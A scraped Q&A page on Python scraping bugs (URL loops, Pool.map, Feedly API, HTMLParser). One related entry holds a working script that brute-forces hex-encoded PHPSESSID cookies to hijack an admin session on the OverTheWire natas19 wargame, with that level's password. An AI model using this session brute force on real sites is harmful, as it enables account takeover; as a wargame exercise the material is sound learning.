How to scrape many dynamic urls in Python - python
I want to scrape one dynamic url at a time.
What I did is that I scrape the URL from that I get from all the hrefs and then I want to scrape that URL.
What I am trying:
from bs4 import BeautifulSoup
import urllib.request
import re
r = urllib.request.urlopen('http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware')
soup = BeautifulSoup(r, "html.parser")
links = soup.find_all("a", href=re.compile(r"expexhibitorlist\.aspx\?categoryno=[0-9]+"))
linksfromcategories = ([link["href"] for link in links])
string = "http://i.cantonfair.org.cn/en/"
str1 = [string + x for x in linksfromcategories]
fulllinksfromcategories = '\n'.join(str1)
lfc = urllib.request.urlopen(fulllinksfromcategories).read()
soup2 = BeautifulSoup(lfc,"html.parser")
print(soup2)
But it gives me the following error:
Traceback (most recent call last):
File "D:\python\scarpepython.py", line 50, in <module>
lfc = urllib.request.urlopen(fulllinksfromcategories).read()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 162, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 465, in open
response = self._open(req, data)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 483, in _open
'_open', req)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 443, in _call_chain
result = func(*args)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 1268, in http_open
return self.do_open(http.client.HTTPConnection, req)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 1243, in do_open
r = h.getresponse()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 1174, in getresponse
response.begin()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 282, in begin
version, status, reason = self._read_status()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 264, in _read_status
raise BadStatusLine(line)
http.client.BadStatusLine:
this could be an option using lxml.
from sys import exit
from pprint import pprint
import lxml.html
import requests
import re
url = 'http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware&page=1'
doc = requests.get(url)
root = lxml.html.fromstring(doc.text)
regexp_total_pages = re.compile(ur"Pages\s\d\/(\d+)")
text_total_pages = root.xpath('//*[#id="AspNetPager1"]/div[1]/text()')[0].strip()
total_pages = int(re.match(regexp_total_pages,text_total_pages).group(1))
all_links = list()
for i in range(1,total_pages + 1):
url = "http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware&page={page}".format(page=i)
doc = requests.get(url)
root = lxml.html.fromstring(doc.text)
all_links.append(root.xpath('//*[#id="form1"]/div[*]/div[*]/h3/a/#href'))
pprint(all_links)
Output:
[['expCompany.aspx?corpid=0776011226',
'expCompany.aspx?corpid=0767408756',
'expCompany.aspx?corpid=0768210055',
'expCompany.aspx?corpid=0797720568',
'expCompany.aspx?corpid=0732708199',
'expCompany.aspx?corpid=0793210033',
'expCompany.aspx?corpid=0732106474',
'expCompany.aspx?corpid=0758010034',
'expCompany.aspx?corpid=0971067386',
'expCompany.aspx?corpid=0740321671'],
['expCompany.aspx?corpid=0778019678',
'expCompany.aspx?corpid=0856547211',
'expCompany.aspx?corpid=0786118468',
'expCompany.aspx?corpid=0836547578',
'expCompany.aspx?corpid=0898829143',
'expCompany.aspx?corpid=0785822466',
'expCompany.aspx?corpid=0886647641',
'expCompany.aspx?corpid=0965278225',
'expCompany.aspx?corpid=0889552449',
'expCompany.aspx?corpid=0757118156'],
['expCompany.aspx?corpid=0800629095',
'expCompany.aspx?corpid=0797100877',
'expCompany.aspx?corpid=0791001566',
'expCompany.aspx?corpid=0955274359',
'expCompany.aspx?corpid=0789803409',
'expCompany.aspx?corpid=0769413578',
'expCompany.aspx?corpid=0712314777',
'expCompany.aspx?corpid=0873048367',
'expCompany.aspx?corpid=0716520166',
'expCompany.aspx?corpid=1444012375'],
['expCompany.aspx?corpid=1020485398',
'expCompany.aspx?corpid=1218502245',
'expCompany.aspx?corpid=1197393480',
'expCompany.aspx?corpid=1366309374',
'expCompany.aspx?corpid=1204799012',
'expCompany.aspx?corpid=1078880722',
'expCompany.aspx?corpid=1367905785',
'expCompany.aspx?corpid=1427517382',
'expCompany.aspx?corpid=1377308235',
'expCompany.aspx?corpid=1437717128'],
['expCompany.aspx?corpid=1361609356',
'expCompany.aspx?corpid=1532524260',
'expCompany.aspx?corpid=1512425129',
'expCompany.aspx?corpid=1371110608',
'expCompany.aspx?corpid=1021582521',
'expCompany.aspx?corpid=0829323712',
'expCompany.aspx?corpid=0756508698',
'expCompany.aspx?corpid=0781315922',
'expCompany.aspx?corpid=0850325858',
'expCompany.aspx?corpid=0713405337'],
['expCompany.aspx?corpid=0895550135',
'expCompany.aspx?corpid=0736604457',
'expCompany.aspx?corpid=0761821937',
'expCompany.aspx?corpid=0853755897',
'expCompany.aspx?corpid=0807455302',
'expCompany.aspx?corpid=0763919269',
'expCompany.aspx?corpid=0736104221',
'expCompany.aspx?corpid=0796616555',
'expCompany.aspx?corpid=0804229227',
'expCompany.aspx?corpid=0746304700'],
['expCompany.aspx?corpid=0839047328',
'expCompany.aspx?corpid=0875628420',
'expCompany.aspx?corpid=0869651030',
'expCompany.aspx?corpid=0838653323',
'expCompany.aspx?corpid=0779107569',
'expCompany.aspx?corpid=0748806674',
'expCompany.aspx?corpid=0736602141',
'expCompany.aspx?corpid=0722715458',
'expCompany.aspx?corpid=0782910676',
'expCompany.aspx?corpid=0798114121'],
['expCompany.aspx?corpid=0830450037',
'expCompany.aspx?corpid=0723700490',
'expCompany.aspx?corpid=0889823692',
'expCompany.aspx?corpid=0984073042',
'expCompany.aspx?corpid=0726719753',
'expCompany.aspx?corpid=0742406942',
'expCompany.aspx?corpid=0742119461',
'expCompany.aspx?corpid=0728315987',
'expCompany.aspx?corpid=0818248812',
'expCompany.aspx?corpid=0750419352'],
['expCompany.aspx?corpid=0982275722',
'expCompany.aspx?corpid=0815756641',
'expCompany.aspx?corpid=0712604536',
'expCompany.aspx?corpid=0798617576',
'expCompany.aspx?corpid=0734217566',
'expCompany.aspx?corpid=0878728894',
'expCompany.aspx?corpid=0772422523',
'expCompany.aspx?corpid=0784607985',
'expCompany.aspx?corpid=0786204936',
'expCompany.aspx?corpid=0886423907'],
['expCompany.aspx?corpid=0789300431',
'expCompany.aspx?corpid=0779921604',
'expCompany.aspx?corpid=0794403082',
'expCompany.aspx?corpid=0769111680',
'expCompany.aspx?corpid=0746606839',
'expCompany.aspx?corpid=0896726003',
'expCompany.aspx?corpid=0886728390',
'expCompany.aspx?corpid=0841756743',
'expCompany.aspx?corpid=1010680461',
'expCompany.aspx?corpid=0837456503'],
['expCompany.aspx?corpid=0735317945',
'expCompany.aspx?corpid=0858556012',
'expCompany.aspx?corpid=0883227862',
'expCompany.aspx?corpid=0802151577',
'expCompany.aspx?corpid=0725403915',
'expCompany.aspx?corpid=0773118307',
'expCompany.aspx?corpid=0977967839',
'expCompany.aspx?corpid=0889257398',
'expCompany.aspx?corpid=0773003774',
'expCompany.aspx?corpid=0741211862'],
['expCompany.aspx?corpid=0944767300',
'expCompany.aspx?corpid=0766703225',
'expCompany.aspx?corpid=0807623222',
'expCompany.aspx?corpid=0754416485',
'expCompany.aspx?corpid=0716414765',
'expCompany.aspx?corpid=0764603066',
'expCompany.aspx?corpid=0757110589',
'expCompany.aspx?corpid=0800248632',
'expCompany.aspx?corpid=0747902779',
'expCompany.aspx?corpid=0738619647'],
['expCompany.aspx?corpid=1098582416',
'expCompany.aspx?corpid=0909669961',
'expCompany.aspx?corpid=0862829627',
'expCompany.aspx?corpid=0892328884',
'expCompany.aspx?corpid=0886729635',
'expCompany.aspx?corpid=0724805261',
'expCompany.aspx?corpid=0877655294',
'expCompany.aspx?corpid=0835853958',
'expCompany.aspx?corpid=0737821957',
'expCompany.aspx?corpid=0785019255'],
['expCompany.aspx?corpid=0873828585',
'expCompany.aspx?corpid=0735401884',
'expCompany.aspx?corpid=0927058069',
'expCompany.aspx?corpid=0794816876',
'expCompany.aspx?corpid=0721211392',
'expCompany.aspx?corpid=0741602341',
'expCompany.aspx?corpid=0760906105',
'expCompany.aspx?corpid=0904473659',
'expCompany.aspx?corpid=0711614568',
'expCompany.aspx?corpid=0753503530'],
['expCompany.aspx?corpid=0774108002',
'expCompany.aspx?corpid=0845328722',
'expCompany.aspx?corpid=0823848403',
'expCompany.aspx?corpid=0876029511',
'expCompany.aspx?corpid=0886827914',
'expCompany.aspx?corpid=0712712280',
'expCompany.aspx?corpid=0833854881',
'expCompany.aspx?corpid=0746216867',
'expCompany.aspx?corpid=0774704214',
'expCompany.aspx?corpid=0730516488'],
['expCompany.aspx?corpid=0716607064',
'expCompany.aspx?corpid=0758917403',
'expCompany.aspx?corpid=0763702256',
'expCompany.aspx?corpid=0721303394',
'expCompany.aspx?corpid=0828647452',
'expCompany.aspx?corpid=0771805641',
'expCompany.aspx?corpid=0741722489',
'expCompany.aspx?corpid=0980867582',
'expCompany.aspx?corpid=0790809611',
'expCompany.aspx?corpid=0714917484'],
['expCompany.aspx?corpid=0790402155',
'expCompany.aspx?corpid=0710118558',
'expCompany.aspx?corpid=0864455955',
'expCompany.aspx?corpid=0784706276',
'expCompany.aspx?corpid=0897623416',
'expCompany.aspx?corpid=0821453137',
'expCompany.aspx?corpid=0754917280',
'expCompany.aspx?corpid=0724600646',
'expCompany.aspx?corpid=0764211415',
'expCompany.aspx?corpid=0735008307'],
['expCompany.aspx?corpid=0795909343',
'expCompany.aspx?corpid=0850830043',
'expCompany.aspx?corpid=0970778277',
'expCompany.aspx?corpid=1075781404',
'expCompany.aspx?corpid=1252802513',
'expCompany.aspx?corpid=1236901616',
'expCompany.aspx?corpid=1435215908',
'expCompany.aspx?corpid=1469712283',
'expCompany.aspx?corpid=1439615100',
'expCompany.aspx?corpid=1245501009'],
['expCompany.aspx?corpid=0901974362',
'expCompany.aspx?corpid=1487117816',
'expCompany.aspx?corpid=1058881186',
'expCompany.aspx?corpid=0809557305',
'expCompany.aspx?corpid=1265998039',
'expCompany.aspx?corpid=1188093431',
'expCompany.aspx?corpid=0995572026',
'expCompany.aspx?corpid=1036184837',
'expCompany.aspx?corpid=0990573086',
'expCompany.aspx?corpid=1464212531'],
['expCompany.aspx?corpid=0858351382',
'expCompany.aspx?corpid=1348806571',
'expCompany.aspx?corpid=0822452086',
'expCompany.aspx?corpid=1428413902',
'expCompany.aspx?corpid=0879752062',
'expCompany.aspx?corpid=1369405760',
'expCompany.aspx?corpid=1256000612',
'expCompany.aspx?corpid=1037680042',
'expCompany.aspx?corpid=1062381570',
'expCompany.aspx?corpid=1461915811'],
['expCompany.aspx?corpid=1373808159',
'expCompany.aspx?corpid=1027382040',
'expCompany.aspx?corpid=1191393458',
'expCompany.aspx?corpid=1133389590',
'expCompany.aspx?corpid=0762910036',
'expCompany.aspx?corpid=1399206654',
'expCompany.aspx?corpid=1253598637',
'expCompany.aspx?corpid=1128889405',
'expCompany.aspx?corpid=1082384190',
'expCompany.aspx?corpid=1077881359'],
['expCompany.aspx?corpid=1584325065',
'expCompany.aspx?corpid=1131692156',
'expCompany.aspx?corpid=1587322969',
'expCompany.aspx?corpid=1251100353',
'expCompany.aspx?corpid=1115590386',
'expCompany.aspx?corpid=1541424572',
'expCompany.aspx?corpid=1137393378',
'expCompany.aspx?corpid=1069988131',
'expCompany.aspx?corpid=1392806069',
'expCompany.aspx?corpid=0766210029'],
['expCompany.aspx?corpid=1143394259',
'expCompany.aspx?corpid=1561819111',
'expCompany.aspx?corpid=1349307520']]
str1 in your case contains a list of URLs. You are joining this list of URLs into a single string separated by newlines and then try to navigate to that mix which of course would not work.
Instead, you meant to loop over the extracted URLs one by one and navigate:
linksfromcategories = [string + x for x in linksfromcategories]
for link in linksfromcategories:
print(link)
lfc = urllib.request.urlopen(link).read()
soup2 = BeautifulSoup(lfc,"html.parser")
print(soup2)
Related
Can't put result of hexlify as cookie in requests.post
So the issue is with this code. import requests import string import binascii import codecs url="http://natas19.natas.labs.overthewire.org/" user="natas19" passwd="8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s" cookie=dict(PHPSESSID="0") test="{}-admin" for i in range(0,641): with requests.Session() as sesh: encoded=binascii.hexlify(bytes(test.format(i),"utf-8")) print("Trying: " + str(i) + "-admin") print(encoded) cookie=dict(PHPSESSID=encoded) sesh.post(url,auth=(user,passwd),cookies=cookie) r=sesh.get(url,auth=(user,passwd)).content print(r) print(sesh.cookies.get_dict()) if "You are an admin." in str(r): print("Success! Admin website:\n" + str(sesh.get(url,auth=(user,passwd)).content)) break; else: print("Failed.") The hexlify returns a value like b'302d61646d696e', but the post later on considers it a string for some reason: Trying: 0-admin b'302d61646d696e' Traceback (most recent call last): File "C:/Users/jakub/Desktop/natas19.py", line 17, in <module> sesh.post(url,auth=(user,passwd),cookies=cookie) File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 635, in post return self.request("POST", url, data=data, json=json, **kwargs) File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 573, in request prep = self.prepare_request(req) File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 471, in prepare_request cookies = cookiejar_from_dict(cookies) File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 537, in cookiejar_from_dict cookiejar.set_cookie(create_cookie(name, cookie_dict[name])) File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 352, in set_cookie and cookie.value.startswith('"') TypeError: startswith first arg must be bytes or a tuple of bytes, not str If I decode the hexlify result instead then the code runs, but without sending the cookie. Please help and thank you in advance!
Try to put .decode('utf-8') at the end of encoded=: import requests url = "http://natas19.natas.labs.overthewire.org/" user = "natas19" passwd = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s" cookie = dict(PHPSESSID="0") test = "{}-admin" for i in range(0, 641): with requests.Session() as sesh: encoded = binascii.hexlify(bytes(test.format(i), "utf-8")).decode('utf-8') # <-- put decode() here! print("Trying: " + str(i) + "-admin") print(encoded) cookie = dict(PHPSESSID=encoded) sesh.post(url, auth=(user, passwd), cookies=cookie) r = sesh.get(url, auth=(user, passwd)).content print(r) print(sesh.cookies.get_dict()) if "You are an admin." in str(r): print( "Success! Admin website:\n" + str(sesh.get(url, auth=(user, passwd)).content) ) break else: print("Failed.")
Unexpected space (not sure what the type of character this space is) while parsing csv file in python
I am iterating through a list of urls from a csv file trying to locate their sitemaps, however, I am getting a weird leading space issue that's causing an error to occur when requests processes each url. I'm trying to figure out what's causing this space to be generated and what type of space it is. I believe something funky is happening with strip() because I can get this to run fine when copying and pasting a url into requests. I am just not sure what type of space this is and what's causing it to occur. Wondering if anyone else is having or had this issue? So far I have tried to solve using the following methods: replace() "".join(split()) regex Here is my code: with open('links.csv') as f: for line in f: strdomain = line.strip() if strdomain: domain = strdomain fix_domain = domain.replace('https://', '').replace('www', '').replace('/', '').replace('.', '').replace(' ', '') ofile = fix_domain + '.txt' # args.ofile domain_rem = domain map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml") url_info = find_sitemap.parse_sitemap(map) print("Found {0} urls".format(len(url_info))) new_urls = [] for u in url_info: new_urls.append(u) print(u) links.csv look like the following with just one column: https://site1.com/ https://site2.com/ https://site3.com/ I printed domain and strdomain and even added the word "this" next to the variable domain so you can see the space being produced clearly: Here is the error I receive in full when running (you will notice there is no leading space within the url after I've copied and pasted from the terminal into here however I provide an image of my terminal below so you can see it): Traceback (most recent call last): File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 358, in <module> main() File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 318, in main map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml") File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/find_sitemap.py", line 5, in get_sitemap get_url = requests.get(url) File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 72, in get return request('get', url, params=params, **kwargs) File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 58, in request return session.request(method=method, url=url, **kwargs) File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 522, in request resp = self.send(prep, **send_kwargs) File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 636, in send adapter = self.get_adapter(url=request.url) File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 727, in get_adapter raise InvalidSchema("No connection adapters were found for '%s'" % url) requests.exceptions.InvalidSchema: No connection adapters were found for 'https://blkgrn.com/sitemap.xml' Here is where you can see the leading space that occurs Here is the code for "find_sitemap.py": from bs4 import BeautifulSoup import requests def get_sitemap(url): get_url = requests.get(url) if get_url.status_code == 200: return get_url.text else: print ('Unable to fetch sitemap: %s.' % url) def process_sitemap(s): soup = BeautifulSoup(s, "lxml") result = [] for loc in soup.findAll('loc'): item = {} item['loc'] = loc.text item['tag'] = loc.parent.name if loc.parent.lastmod is not None: item['lastmod'] = loc.parent.lastmod.text if loc.parent.changeFreq is not None: item['changeFreq'] = loc.parent.changeFreq.text if loc.parent.priority is not None: item['priority'] = loc.parent.priority.text result.append(item) return result def is_sub_sitemap(s): if s['loc'].endswith('.xml') and s['tag'] == 'sitemap': return True else: return False def parse_sitemap(s): sitemap = process_sitemap(s) result = [] while sitemap: candidate = sitemap.pop() if is_sub_sitemap(candidate): sub_sitemap = get_sitemap(candidate['loc']) for i in process_sitemap(sub_sitemap): sitemap.append(i) else: result.append(candidate) return result
Weird error with pool module and beautiful soup: Invalid URL 'h'
I am scraping a very large website with Beautiful Soup for a project and want to use the Pool module to speed it up. I am getting a weird error where it is not correctly reading the list of URL's, as far as I can tell it is just grabbing the first 'h'. The entire code works perfectly if I do not use pool. The list of URL's is read properly. I am not sure if there is something weird about how you have to prepare the URL's when calling p.map(scrapeClauses, links) because if I simply call scrapeClauses(links) everything works. Here is my main function: if __name__ == '__main__': links = list() og = 'https://www.lawinsider.com' halflink = '/clause/limitation-of-liability' link = og + halflink links.append(link) i = 0 while i < 50: try: nextLink = generateNextLink(link) links.append(nextLink) link = nextLink i += 1 except: print('Only ', i, 'links found') i = 50 start_time = time.time() print(links[0]) p = Pool(5) p.map(scrapeClauses, links) p.terminate() p.join() #scrapeClauses(links) and here is scrapeClauses(): def scrapeClauses(links): #header to avoid site detecting scraper headers = requests.utils.default_headers() headers.update({ 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0', }) #list of clauses allText = [] number = 0 for line in links: page_link = line print(page_link) page_response = requests.get(page_link, headers=headers) html_soup = BeautifulSoup(page_response.content, "html.parser") assignments = html_soup.find_all('div', class_ ='snippet-content') for i in range(len(assignments)): assignments[i] = assignments[i].get_text() #option to remove te assignment that precedes each clause #assignments[i] = assignments[i].replace('Assignment.','',1) allText.append(assignments[i]) #change the index of the name of the word doc name = 'limitationOfLiability' + str(number) + '.docx' #some clauses have special characters tat produce an error try: document = Document() stuff = assignments[i] document.add_paragraph(stuff) document.save(name) number += 1 except: continue I did not include generateNextLink() to save space and because I am pretty sure the error is not in there but if someone thinks it is I will provide it. As you can see I 'print(page_link) in scrapeClauses. If I am not using pool, it will print all the normal links. But if I use pool, a bunch of h's print out line after line. I then get and error that h is not a valid URL. I will show the error code below. https://www.lawinsider.com/clause/limitation-of-liability h h h h h h h h h h h h h h h h h multiprocessing.pool.RemoteTraceback: """ Traceback (most recent call last): File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\multiproce ssing\pool.py", line 121, in worker result = (True, func(*args, **kwds)) File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\multiproce ssing\pool.py", line 44, in mapstar return list(map(*args)) File "C:\Users\wquinn\Web Scraping\assignmentBSScraper.py", line 20, in scrape Clauses page_response = requests.get(page_link, headers=headers) File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa ges\requests\api.py", line 75, in get return request('get', url, params=params, **kwargs) File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa ges\requests\api.py", line 60, in request return session.request(method=method, url=url, **kwargs) File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa ges\requests\sessions.py", line 519, in request prep = self.prepare_request(req) File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa ges\requests\sessions.py", line 462, in prepare_request hooks=merge_hooks(request.hooks, self.hooks), File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa ges\requests\models.py", line 313, in prepare self.prepare_url(url, params) File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa ges\requests\models.py", line 387, in prepare_url raise MissingSchema(error) requests.exceptions.MissingSchema: Invalid URL 'h': No schema supplied. Perhaps you meant http://h?
The second argument of p.map get an list. Each such element will be sent to a function. So you function got a string and not a list of string as you expect. The minimal example is: from multiprocessing import Pool def f(str_list): for x in str_list: print ('hello {}'.format(x)) if __name__ == '__main__': str_list = ['111', '2', '33'] p = Pool(5) p.map(f, str_list) p.terminate() p.join() Output is: hello 1 hello 1 hello 1 hello 2 hello 3 hello 3
Feedly API & JSON
I'm trying to access the Feedly API to collect and share articles automatically to a Facebook group. So far, I haven't even able to figure out how to use the Feedly API wrapper located here: https://github.com/zgw21cn/FeedlyClient from feedlyclient import FeedlyClient # Feedly feedaccess = "removed" myfeedId = "removed" con = FeedlyClient() con.get_feed_content(feedaccess,myfeedId,False,10000) parsed = json.loads(con) print json.dumps(parsed) Terminal PS D:\Python Projects\Python 2\fbauto> & python "d:/Python Projects/Python 2/fbauto/feedlytest.py" Traceback (most recent call last): File "d:/Python Projects/Python 2/fbauto/feedlytest.py", line 8, in <module> con = FeedlyClient.get_feed_content(feedaccess,myfeedId,False,10000) TypeError: unbound method get_feed_content() must be called with FeedlyClient instance as first argument (got str instance instead) PS D:\Python Projects\Python 2\fbauto> & python "d:/Python Projects/Python 2/fbauto/feedlytest.py" Traceback (most recent call last): File "d:/Python Projects/Python 2/fbauto/feedlytest.py", line 9, in <module> con.get_feed_content(feedaccess,myfeedId,False,10000) File "d:\Python Projects\Python 2\fbauto\feedlyclient.py", line 75, in get_feed_content return res.json() File "C:\Python27\lib\site-packages\requests\models.py", line 892, in json return complexjson.loads(self.text, **kwargs) File "C:\Python27\lib\json\__init__.py", line 339, in loads return _default_decoder.decode(s) File "C:\Python27\lib\json\decoder.py", line 364, in decode obj, end = self.raw_decode(s, idx=_w(s, 0).end()) File "C:\Python27\lib\json\decoder.py", line 382, in raw_decode raise ValueError("No JSON object could be decoded") ValueError: No JSON object could be decoded Please help. SECOND ATTEMPT import json import requests # Feedly feedaccess = "REMOVED" myfeedid = "user/REMOVED/category/tutorial" def get_feed_content(unreadOnly=None, newerThan=None, count="10", continuation=None, ranked=None): """ return contents of a feed :param access_token: :param streamId: :param unreadOnly: :param newerThan: :param count: :param continuation: :param ranked: :return: """ headers = {'Authorization': 'OAuth ' + feedaccess} quest_url = ('http://cloud.feedly.com/v3/streams/contents') params = dict(streamId=myfeedid) # Optional parameters if unreadOnly is not None: params['unreadOnly'] = unreadOnly if newerThan is not None: params['newerThan'] = newerThan if count is not None: params['count'] = count if continuation is not None: params['continuation'] = continuation if ranked is not None: params['ranked'] = ranked res = requests.get(url=quest_url, params=params, headers=headers) return res.json() con = get_feed_content() print json.dumps(con , indent=4) TERMINAL { "items": [], "id": "user/REMOVED/category/tutorial" } Just returns my user credentials. Feedly documentation says I can use category as stream ID. https://developer.feedly.com/v3/streams/ THIRD ATTEMPT import json import requests from client import FeedlyClient # Feedly feedaccess = "REMOVED" myfeedid = "user/REMOVED/category/tutorial" feedcount = "20" myurl = "http://cloud.feedly.com/v3/streams/contents?streamId=" + myfeedid + "&count=" + feedcount headers = {'Authorization': 'OAuth ' + feedaccess} res = requests.get(url=myurl, headers=headers) con = res.json() print json.dumps(con , indent=4) SAME TERMINAL RESPONSE
The third attempt worked. There was a capitalization in my category name. It should be Tutorial not tutorial. Please see original post for code.
Why does HTMLParser miss some tags?
I used HTMLParser to count how many h2 tag in http://www.worldgolf.com/courses/usa/massachusetts/ here is the code: class City2Parser(HTMLParser): def handle_starttag(self,tag,attrs): if tag == 'h2': print 'h2' req = urllib2.Request('http://www.worldgolf.com/courses/usa/massachusetts/') html = urllib2.urlopen(req) parser = City2Parser() parser.feed(html.read()) it only prints once, why? obviously the page has three h2 tag
You'd have to implement a bunch of handlers in your City2Parser to handle the mess of tags and javascript that HTMLParser doesn't seem to take care of out of the box. Why don't you instead use something like BeautiflSoup: from BeautifulSoup import BeautifulSoup import urllib2 page = urllib2.urlopen('http://www.worldgolf.com/courses/usa/massachusetts/') soup = BeautifulSoup(page) s = soup.findAll('h2') print len(s) for t in s: print t.text gives: 3 Featured Massachusetts Golf Course Golf Locations Latest user ratings for Massachusetts golf courses Unless the point is to use HTMLParser.
Look at what happens. >>> from HTMLParser import HTMLParser >>> import urllib2 >>> class City2Parser(HTMLParser): ... def handle_starttag(self,tag,attrs): ... if tag == 'h2': ... print 'h2' ... >>> req = urllib2.Request('http://www.worldgolf.com/courses/usa/massachusetts/') >>> html = urllib2.urlopen(req) >>> parser = City2Parser() >>> parser.feed(html.read()) h2 Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib/python2.7/HTMLParser.py", line 109, in feed self.goahead(0) File "/usr/lib/python2.7/HTMLParser.py", line 151, in goahead k = self.parse_starttag(i) File "/usr/lib/python2.7/HTMLParser.py", line 232, in parse_starttag endpos = self.check_for_whole_start_tag(i) File "/usr/lib/python2.7/HTMLParser.py", line 307, in check_for_whole_start_tag self.error("malformed start tag") File "/usr/lib/python2.7/HTMLParser.py", line 116, in error raise HTMLParseError(message, self.getpos()) HTMLParser.HTMLParseError: malformed start tag, at line 249, column 30 It's complaining about the invalid HTML <br style="clear:left;". HTMLParser cares about getting valid HTML.